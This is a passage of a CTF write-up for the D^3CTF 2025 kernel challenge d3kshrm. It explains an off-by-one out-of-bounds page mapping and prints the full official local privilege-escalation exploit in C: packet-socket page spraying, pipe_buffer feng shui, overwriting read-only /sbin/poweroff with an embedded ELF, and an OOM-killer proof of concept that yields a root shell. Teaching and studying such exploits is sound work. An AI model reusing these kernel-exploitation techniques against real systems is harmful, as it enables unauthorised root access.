Now let’s talk about those state-of-the-art academic techniques whose foundation is also the cross-cache attack, such as Dirty PageTable (also called SLUBStick; I don’t know why we have two names here, and I’m still not sure whether the authors are the same, as the original Dirty PageTable blog has been removed and I did not have much time to dig into it) and DirtyPage (also named Page Spray by its authors): are they powerful and capable enough to be used in this challenge? The answer seems to be NOT EASILY, as such approaches are designed for different vulnerability patterns.

  • For the SLUBStick, we will need additional capabilities to do the UAF write for at least several times, which require us to construct complex and multi-stage cross-cache page freeing and reclaiming, rising the difficulty of constructing the exploitation to a high level while lower down the usability and stability.
  • DirtyPage says that "it takes a further step" by confusing the object counting on a SLUB (refer to its Figure 1: Page Spray Exploit Model for Double Free). However, it is useless to overwrite an object with no functionality. In my opinion it might be more suitable for attacking kernel objects with specific functionalities (like file or pipe_buffer?), but if the target object lacks enough capabilities for the later attacking stages, such an exploitation might not apply.

Hence, a pure cross-cache attack seems more capable and usable for d3kheap2 in my opinion. Anyway, thanks to the authors for developing such powerful exploitation techniques, which have brought our views to a different aspect of the problem.

Another point is that assistant techniques like the timing side-channel attack used by Pspray to predict when SLUB pages are allocated do not have much effect on general kernel heap exploitation, not only on d3kheap2. A core reason is that with mitigations like CONFIG_RANDOM_KMALLOC_CACHES in the kernel mainline, knowing whether ONE NEW SLUB page has been allocated is no longer that important: as our object allocations always come randomly from different dedicated pools, heap spraying with approximate estimation seems to be the only workable solution, and precise allocation has become almost impossible. Though this mitigation was not enabled in d3kheap2, I still want to talk about something closer to real-world exploitation. Hope that you will not mind :)

Though I still have many thoughts about Linux kernel exploitation, this passage has become too long at this point, so let's just stop here. Anyway, I would like to thank everyone who participated in this CTF and tried to solve my challenges, whether you got the flag or not. I'm still sorry that I did not present you with something as cool as d3kcache due to multiple reasons including limited time. Hope that you will not mind :)

0x02. D3KSHRM | 1 Solve

You can get the original attachment at https://github.com/arttnba3/D3CTF2025_d3kshrm.

You know what? Sharing is always a good moral quality. That’s the reason why I’m going to share some of my precious memories with all of you!

Copyright(c) 2025 <ディーキューブ・シーティーエフ カーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

0x00. Introduction

In this challenge we created a kernel module named d3kshrm.ko, which provides users with the functionality to create shared memory. Through the ioctl() interface we have the following capabilities:

  • Create a new shared memory with specific size
  • Bind to an existing shared memory
  • Unbind from current shared memory
  • Delete an existing shared memory

And to access the shared memory, we can mmap() the file descriptor after binding it, which is where the vulnerability lies. Due to an off-by-one in the bounds check on d3kshrm::pages, an attacker can treat the 8 bytes immediately past the end of the d3kshrm::pages array as a pointer to a struct page and map it into the user address space.

static vm_fault_t d3kshrm_vm_fault(struct vm_fault *vmf)
{
    struct d3kshrm_struct *d3kshrm;
    struct vm_area_struct *vma;
    vm_fault_t res;

    vma = vmf->vma;
    d3kshrm = (struct d3kshrm_struct *) vma->vm_private_data;

    spin_lock(&d3kshrm->lock);

    /* vulnerability here */
    // if (vmf->pgoff >= d3kshrm->page_nr) {
    if (vmf->pgoff > d3kshrm->page_nr) {
        res = VM_FAULT_SIGBUS;
        goto ret;
    }

    get_page(d3kshrm->pages[vmf->pgoff]);
    vmf->page = d3kshrm->pages[vmf->pgoff];
    res = 0;

ret:
    spin_unlock(&d3kshrm->lock);

    return res;
}

Exploitation

As d3kshrm::pages is allocated from an isolated kmem_cache, we have to use page-level heap fengshui to manipulate page-level memory and try to map page pointers from outside the challenge's own allocations. We cannot exploit the module's pages directly by double-mapping, as the page reference count acts as a guard that prevents us from creating a page-level double free. Hence our available strategy is to map pages that originally have read-only permissions into user space, which is reminiscent of CVE-2023-2008, which also abuses an out-of-bounds page mapping to perform a DirtyPage-like attack. Here comes our exploitation strategy:

  • Use page-level heap fengshui to rearrange page-level memory so that the SLUB pages of the challenge's isolated kmem_cache land between two SLUB pages holding victim objects. Here we chose pipe_buffer as the victim, as it has a pointer to a struct page at the start of the structure, which makes the out-of-bounds mapping possible.
  • Open the target file with read-only permission and use splice() to store the first page of the file into a pipe_buffer.
  • Exploit the vulnerability to perform the out-of-bounds page mapping, mapping the originally read-only page into user space with read & write permissions. This grants us the power to overwrite a read-only file.

I finally chose /sbin/poweroff (which is a symbolic link to busybox) as our victim file, as the final line of /etc/init.d/rcS executes /sbin/poweroff with root privilege, which grants us the power to execute arbitrary code as root. The final exploit is in exp.c in this repository, whose success rate is approximately 84.63% (measured over more than 2048 automated local runs), and I'm convinced there is room to raise it above 95%, as I haven't adopted a complex, advanced page-level heap fengshui procedure yet.

/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>

/**
* Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(SUCCESS_MSG("[*] Process binded to core ") "%d\n", core);
}

void get_root_shell(void)
{
if(getuid()) {
log_error("[x] Failed to get the root!");
sleep(5);
exit(EXIT_FAILURE);
}

log_success("[+] Successful to get the root.");
log_info("[*] Execve root shell now...");

system("/bin/sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

int unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
log_error("[x] Unable to create new namespace for PGV subsystem");
return -EPERM;
}

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

return 0;
}

/**
* pgv pages sprayer related
* note that we should create two processes:
* - the parent is the one to send cmd and get root
* - the child creates an isolated user namespace by calling unshare_setup(),
* receiving cmd from the parent and operating on it only
**/

#define PGV_SOCKET_MAX_NR 1024
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

enum {
PGV_CMD_ALLOC_SOCKET,
PGV_CMD_ALLOC_PAGE,
PGV_CMD_FREE_PAGE,
PGV_CMD_FREE_SOCKET,
PGV_CMD_EXIT,
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_packet_socket()
{
int socket_fd;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
ret = socket_fd;
goto err_out;
}

return socket_fd;

err_out:
return ret;
}

int alloc_socket_pages(int socket_fd, unsigned int size, unsigned nr)
{
struct tpacket_req req;
int version, ret;

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_TX_RING)");
goto err_setsockopt;
}

return 0;

err_setsockopt:
return ret;
}

int free_socket_pages(int socket_fd)
{
struct tpacket_req req;
int ret;

memset(&req, 0, sizeof(req));
req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_TX_RING)");
goto err_setsockopt;
}

return 0;

err_setsockopt:
return ret;
}

void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_SOCKET_MAX_NR];
int ret;

/* create an isolated namespace */
if (unshare_setup()) {
err_exit("FAILED to initialize PGV subsystem for page spraying!");
}

memset(socket_fd, 0, sizeof(socket_fd));

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

switch (req.cmd) {
case PGV_CMD_ALLOC_SOCKET:
if (socket_fd[req.idx] != 0) {
printf(ERROR_MSG("[x] Duplicate idx request: ") "%d\n",req.idx);
ret = -EINVAL;
break;
}

ret = create_packet_socket();
if (ret < 0) {
perror(ERROR_MSG("[x] Failed at allocating packet socket"));
break;
}

socket_fd[req.idx] = ret;
ret = 0;

break;
case PGV_CMD_ALLOC_PAGE:
if (socket_fd[req.idx] == 0) {
printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
ret = -EINVAL;
break;
}

ret = alloc_socket_pages(socket_fd[req.idx], req.size, req.nr);
if (ret < 0) {
perror(ERROR_MSG("[x] Failed to alloc packet socket pages"));
break;
}

break;
case PGV_CMD_FREE_PAGE:
if (socket_fd[req.idx] == 0) {
printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
ret = -EINVAL;
break;
}

ret = free_socket_pages(socket_fd[req.idx]);
if (ret < 0) {
perror(ERROR_MSG("[x] Failed to free packet socket pages"));
break;
}

break;
case PGV_CMD_FREE_SOCKET:
if (socket_fd[req.idx] == 0) {
printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
ret = -EINVAL;
break;
}

close(socket_fd[req.idx]);

break;
case PGV_CMD_EXIT:
log_info("[*] PGV child exiting...");
ret = 0;
break;
default:
printf(
ERROR_MSG("[x] PGV child got unknown command : ")"%d\n",
req.cmd
);
ret = -EINVAL;
break;
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != PGV_CMD_EXIT);
}

void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

int create_pgv_socket(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = PGV_CMD_ALLOC_SOCKET,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

int destroy_pgv_socket(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = PGV_CMD_FREE_SOCKET,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = PGV_CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = PGV_CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

usleep(10000);

return ret;
}

/**
* Challenge Interface
**/

#define CMD_CREATE_D3KSHRM 0x3361626e
#define CMD_DELETE_D3KSHRM 0x74747261
#define CMD_SELECT_D3KSHRM 0x746e6162
#define CMD_UNBIND_D3KSHRM 0x33746172

#define MAX_PAGE_NR 0x100

int chal_fd;

int d3kshrm_create(int fd, unsigned long page_nr)
{
return ioctl(fd, CMD_CREATE_D3KSHRM, page_nr);
}

int d3kshrm_delete(int fd, unsigned long idx)
{
return ioctl(fd, CMD_DELETE_D3KSHRM, idx);
}

int d3kshrm_select(int fd, unsigned long idx)
{
return ioctl(fd, CMD_SELECT_D3KSHRM, idx);
}

int d3kshrm_unbind(int fd)
{
return ioctl(fd, CMD_UNBIND_D3KSHRM);
}

/**
* Exploitation procedure
**/

#define PIPE_SPRAY_NR 126

int prepare_pipe(int pipe_fd[PIPE_SPRAY_NR][2])
{
int err;

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((err = pipe(pipe_fd[i])) < 0) {
printf(
ERROR_MSG("[x] failed to alloc ")"%d"ERROR_MSG(" pipe!\n"), i
);
return err;
}
}

return 0;
}

int expand_pipe(int pipe_fd[PIPE_SPRAY_NR][2], size_t size)
{
int err;

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((err = fcntl(pipe_fd[i][1], F_SETPIPE_SZ, size)) < 0) {
printf(
ERROR_MSG("[x] failed to expand ")"%d"ERROR_MSG(" pipe!\n"), i
);
return err;
}
}

return 0;
}

ssize_t splice_pipe(int pipe_fd[PIPE_SPRAY_NR][2], int victim_fd)
{
ssize_t err;
loff_t offset;

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
offset = 0;
if ((err = splice(victim_fd,&offset,pipe_fd[i][1],NULL,0x1000,0)) < 0) {
printf(
ERROR_MSG("[x] failed to splice ")"%d"ERROR_MSG(" pipe!\n"),i
);
return err;
}
}

return 0;
}

#define PBF_SZ_PAGE_NR (0x1000 / 8)

uint8_t shellcode[] = {
/* ELF header */

// e_ident[16]
0x7f, 0x45, 0x4c, 0x46, /* Magic number "\x7fELF" */
0x02, /* ELF type: 64-bit */
0x01, /* ELF encode: LSB */
0x01, /* ELF version: current */
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Reserve */
// e_type: ET_EXEC
0x02, 0x00,
// e_machine: AMD x86-64
0x3e, 0x00,
// e_version: 1
0x01, 0x00, 0x00, 0x00,
// e_entry: 0x0000000000400078
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
// e_phoff: 0x40
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// e_shoff: 0
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// e_flags: 0
0x00, 0x00, 0x00, 0x00,
// e_ehsize: 0x40
0x40, 0x00,
// e_phentsize: 0x38
0x38, 0x00,
// e_phnum: 1
0x01, 0x00,
// e_shentsize: 0
0x00, 0x00,
// e_shnum: 0
0x00, 0x00,
// e_shstrndx: 0
0x00, 0x00,

/* Program Header Table[0] */

// p_type: PT_LOAD
0x01, 0x00, 0x00, 0x00,
// p_flags: PF_R | PF_W | PF_X
0x07, 0x00, 0x00, 0x00,
// p_offset: 0
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// p_vaddr: 0x0000000000400000
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
// p_paddr: 0x0000000000400000
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
// p_filesz: 0xD5
0xD5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// p_memsz: 0xF2
0xF2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// p_align: 0x1000
0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

/* Sections[0]: Shellcode */

// opening "/flag" and read

// xor rax, rax
0x48, 0x31, 0xc0,
// push rax
0x50,
// movabs rax, 0x67616c662f # "/flag"
0x48, 0xb8, 0x2f, 0x66, 0x6c, 0x61, 0x67, 0x00, 0x00, 0x00,
// push rax
0x50,
// mov rax, 0x02
0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00,
// mov rdi, rsp
0x48, 0x89, 0xe7,
// xor rsi, rsi
0x48, 0x31, 0xf6,
// syscall
0x0f, 0x05,
// mov rdi, rax
0x48, 0x89, 0xc7,
// xor rax, rax
0x48, 0x31, 0xc0,
// sub rsp, 0x100
0x48, 0x81, 0xec, 0x00, 0x01, 0x00, 0x00,
// mov rsi, rsp
0x48, 0x89, 0xe6,
// mov rdx, 0x100
0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
// syscall
0x0f, 0x05,
// mov rax, 0x1
0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,
// mov rdi, 0x1
0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,
// mov rsi, rsp
0x48, 0x89, 0xe6,
// mov rdx, 0x100
0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
// syscall
0x0f, 0x05,
// xor rdi, rdi
0x48, 0x31, 0xff,
// mov rax, 0x3c
0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00,
// syscall
0x0f, 0x05,
};

#define PAGE8_SPRAY_NR 0x100

int prepare_pgv_pages(void)
{
int errno;

for (int i = 0; i < PAGE8_SPRAY_NR; i++) {
if ((errno = create_pgv_socket(i)) < 0) {
printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
return errno;
}

if ((errno = alloc_page(i, 0x1000 * 8, 1)) < 0) {
printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
return errno;
}
}

return 0;
}

#define MSG_QUEUE_NR 0x100
#define MSG_SPRAY_NR 2

int prepare_msg_queue(int msqid[MSG_QUEUE_NR])
{
for (int i = 0; i < MSG_QUEUE_NR; i++) {
if ((msqid[i] = get_msg_queue()) < 0) {
printf(
ERROR_MSG("[x] Unable to create ")"%d"ERROR_MSG(" msg_queue\n"),
i
);
return msqid[i];
}
}

return 0;
}

int spray_msg_msg(int msqid[MSG_QUEUE_NR])
{
char buf[0x2000];
int err;

for (int i = 0; i < MSG_QUEUE_NR; i++) {
for (int j = 0; j < MSG_SPRAY_NR; j++) {
if ((err = write_msg(msqid[i],buf,0xF00,0x3361626e74747261+i)) < 0){
return err;
}
}
}

return 0;
}

#define D3KSHRM_SLUB_OBJ_NR 8
#define D3KSHRM_SPRAY_NR (D3KSHRM_SLUB_OBJ_NR * 2)

void exploit(void)
{
int pipe_fd1[PIPE_SPRAY_NR][2], pipe_fd2[PIPE_SPRAY_NR][2];
int msqid[MSG_QUEUE_NR];
int d3kshrm_fd[D3KSHRM_SPRAY_NR], d3kshrm_idx[D3KSHRM_SPRAY_NR];
int victim_fd;
char *oob_buf[D3KSHRM_SPRAY_NR];
void *victim_buf;

log_info("[*] Preparing...");

bind_core(0);
prepare_pgv_system();

victim_fd = open("/sbin/poweroff", O_RDONLY);
if (victim_fd < 0) {
perror("Failed to open target victim file");
exit(EXIT_FAILURE);
}

log_info("[*] Allocating msg_queue for clearing kmem_cache...");
if (prepare_msg_queue(msqid) < 0) {
err_exit("FAILED to create msg_queue!");
}

log_info("[*] Allocating pipe_fd1 group...");
if (prepare_pipe(pipe_fd1) < 0) {
perror(ERROR_MSG("Failed to spray pipe_buffer"));
err_exit("FAILED to prepare first part of pipes.\n");
}

log_info("[*] Allocating pipe_fd2 group...");
if (prepare_pipe(pipe_fd2) < 0) {
perror(ERROR_MSG("Failed to spray pipe_buffer"));
err_exit("FAILED to prepare second part of pipes.\n");
}

log_info("[*] Preparing D3KSHRM files...");
for (int i = 0; i < D3KSHRM_SPRAY_NR; i++) {
if ((d3kshrm_fd[i] = open("/proc/d3kshrm", O_RDWR)) < 0) {
perror(ERROR_MSG("Failed to open /proc/d3kshrm"));
err_exit("FAILED to spray D3KSHRM files.\n");
}
}

log_info("[*] Pre-allocating ONE SLUB pages for D3kSHRM...");
if ((d3kshrm_idx[0] = d3kshrm_create(d3kshrm_fd[0], PBF_SZ_PAGE_NR)) < 0) {
perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
err_exit("FAILED to spray D3KSHRM shared memory.\n");
}

log_info("[*] Allocating pgv pages...");
if (prepare_pgv_pages() < 0) {
err_exit("FAILED to prepare pages on packet socket.\n");
}

log_info("[*] Clear previous redundant memory storage in kernel...");
if (spray_msg_msg(msqid) < 0) {
perror(ERROR_MSG("Failed to spray msg_msg"));
err_exit("FAILED to clear reduncant kernel memory storage.\n");
}

log_info("[*] Spraying D3KSHRM buffer...");

free_page((PAGE8_SPRAY_NR / 2) + 1);
destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 1);

for (int i = 1; i < D3KSHRM_SPRAY_NR; i++) {
if ((d3kshrm_idx[i] = d3kshrm_create(d3kshrm_fd[i], PBF_SZ_PAGE_NR))<0){
perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
err_exit("FAILED to spray D3KSHRM shared memory.\n");
}
}

log_info("[*] Expanding pipe_buffer...");

free_page(PAGE8_SPRAY_NR / 2);
destroy_pgv_socket(PAGE8_SPRAY_NR / 2);

if (expand_pipe(pipe_fd1, 0x1000 * 64) < 0) {
perror(ERROR_MSG("Failed to expand pipe_buffer"));
err_exit("FAILED to expand first part of pipes.\n");
}

log_info("[*] Expanding pipe_buffer...");

free_page((PAGE8_SPRAY_NR / 2) + 2);
destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 2);

if (expand_pipe(pipe_fd2, 0x1000 * 64) < 0) {
perror(ERROR_MSG("Failed to expand pipe_buffer"));
err_exit("FAILED to expand second part of pipes.\n");
}

log_info("[*] Splicing victim file into pipe group...");

if (splice_pipe(pipe_fd1, victim_fd) < 0) {
perror(ERROR_MSG("Failed to splice target fd"));
err_exit("FAILED to splice victim file into pipe_fd1 group.\n");
}

if (splice_pipe(pipe_fd2, victim_fd) < 0) {
perror(ERROR_MSG("Failed to splice target fd"));
err_exit("FAILED to splice victim file into pipe_fd2 group.\n");
}

log_info("[*] Doing mmap and mremap...");

for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
if (d3kshrm_select(d3kshrm_fd[i], d3kshrm_idx[i]) < 0) {
perror(ERROR_MSG("Failed to select D3KSHRM shared memory"));
err_exit("FAILED to select D3KSHRM shared memory.\n");
}

oob_buf[i] = mmap(
NULL,
0x1000 * PBF_SZ_PAGE_NR,
PROT_READ | PROT_WRITE,
MAP_FILE | MAP_SHARED,
d3kshrm_fd[i],
0
);
if (oob_buf[i] == MAP_FAILED) {
perror(ERROR_MSG("Failed to map chal_fd"));
err_exit("FAILED to mmap chal_fd.\n");
}

oob_buf[i] = mremap(
oob_buf[i],
0x1000 * PBF_SZ_PAGE_NR,
0x1000 * (PBF_SZ_PAGE_NR + 1),
MREMAP_MAYMOVE
);
if (oob_buf[i] == MAP_FAILED) {
perror(ERROR_MSG("Failed to mremap oob_buf area"));
err_exit("FAILED to mremap chal's mmap area.\n");
}
}

log_info("[*] Checking for oob mapping...");

victim_buf = NULL;
for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
/* Examine ELF header to see whether we hit the busybox */
if (*(size_t*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR] == 0x3010102464c457f){
victim_buf = (void*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR];
break;
}
}

if (!victim_buf) {
err_exit("FAILED to oob mmap pages in pipe!");
}

log_info("[*] Abusing OOB mmap to overwrite read-only file...");
memcpy(victim_buf, shellcode, sizeof(shellcode));

log_success("[+] Just enjoy :)");
}

void banner(void)
{
puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kshrm --------") "\n"
INFO_MSG("-------- Official Exploitation --------\n")
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
banner();
exploit();
return 0;
}

Unintended Solution

I'm so sorry that I didn't configure the file system well, which caused an unintended solution. Before we start, I'd like to thank Qanux from W&M, who found this issue by chance. To be honest, the reason the unintended solution could happen is that I configured the file system too "normally".

A minimal proof-of-concept function to stably trigger the unintended solution without the challenge kernel module is as follows (for helper functions like prepare_pgv_system() and alloc_page(), please refer to exp.c):

void unintended_exploit(void)
{
    int errno;

    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((errno = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }

        printf("[*] No.%d times\n", i);
        fflush(stdout);
    }

    puts("Done!?");
}

While executing the proof-of-concept, we notice that our process is suddenly terminated. Then we simply get a root shell for no apparent reason:

image.png

How and why? To figure out what is happening, let's take a brief look at our proof-of-concept, which simply keeps allocating memory via setsockopt() on packet sockets. We all know that if a process's memory keeps growing and occupies too much of it, there will not be enough free memory left for the system to use, so the OOM Killer will be woken up to decide whether a process must be killed to reclaim its memory.

Which process will be chosen to be killed? As there are only a few user-land processes running in the environment, there is no doubt that the candidate victims can only be rcS, sh, and exploit. But who will be chosen as the unlucky sheep? Well, the OOM Killer picks the victim based on multiple factors including resource consumption, and we can check the score by examining /proc/[pid]/oom_score. The result we need (read by a simple C function) is as follows:

image.png

As we can see, rcS and sh have the same OOM score, so the unlucky guy will be one of them, as exploit has a lower score. And as rcS is a root process while sh is not, it seems that killing sh makes sense? The answer is YES, BUT NOT ONLY YES. Let us see what really happened:

ALL OF THEM ARE KILLED to reclaim memory! But why? An important reason is that after killing one victim process, there may still not be enough spare memory to allocate. This may be due to asynchronous memory reclaiming, memory fragmentation, and so on. What's more, we keep allocating memory the whole time. Therefore the OOM Killer was invoked multiple times (even within one allocation procedure), killed sh and rcS according to their high oom_score and ordered by privilege, and finally killed exploit in the end.

What happens when all these processes are killed? As ttyS0 was occupied by these processes and finally becomes free at that moment, init regains control and detects that the TTY is now idle. Note that our initialization system is busybox-init, as we can see that /sbin/init is a symbolic link to busybox. busybox-init uses /etc/inittab as its configuration file, so let's see what I wrote in this file a long time ago, following the official example from busybox:

1
2
3
4
5
6
::sysinit:/etc/init.d/rcS
::askfirst:/bin/ash
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

Let's take a look at the ::askfirst: option, whose value points to /bin/ash. What is that, and under what conditions will it be executed? When there is no process running on the TTY, the program specified by the askfirst option will be executed by /sbin/init with root privilege (just like getty).

Therefore we now know why we can get a root shell: at the very beginning, /etc/init.d/rcS runs on ttyS0 and spawns a user shell for us to interact with. When we do unlimited memory allocation in kernel space to occupy almost all the free memory, the OOM Killer is woken up to kill /etc/init.d/rcS. As there is then no process running on ttyS0, the /bin/ash specified by ::askfirst: is executed, providing us with a root shell.

That is also how Qanux from W&M solved d3kshrm by accident: he just allocated memory directly through the functionality provided by d3kshrm.ko, and due to my misconfiguration and design mistake, the expected allocatable memory is much larger than the memory of the virtual machine. Therefore the OOM Killer was woken multiple times and killed all the user-land processes except init. After ttyS0 went idle again, busybox-init simply handed a root shell directly to the ttyS0 he was using.

Hence, here comes another question: can we simply allocate memory directly in user space instead of exploiting the memory-allocation APIs in the kernel? The answer is almost definitely NO. An important reason is that if we allocate memory directly in our own process (like doing tons of malloc() to expand the heap segment), our own OOM score grows as well, and we will always be the first one to be killed. Once we are killed, the memory allocation stops and there is no need for the OOM Killer to kill anyone else.

When I got this report during the competition, I quickly realized that it must be caused by the OOM Killer after reviewing the pictures provided by the player. What I didn't expect is that everyone including rcS would be killed, as this had never happened in any CTF challenge I made before. My old expectation was that the kernel would panic due to the OOM, and the result told me that the kernel does not always panic (lol, is the kernel afraid of dying as well?). The player who discovered this unintended solution reported a success rate of at least 30%, while the PoC I wrote above succeeds over 99% of the time. I think this may be caused by the different APIs we called: packet_set_ring() calls vzalloc_noprof(), which only requires the allocated region to be contiguous in virtual memory, meaning the allocation can be split from one high-order allocation into several low-order ones. However, the function in d3kshrm.ko calls alloc_pages() to allocate high-order memory directly, so the kernel panics more easily, as it may not be able to reclaim the required contiguous high-order physical memory.

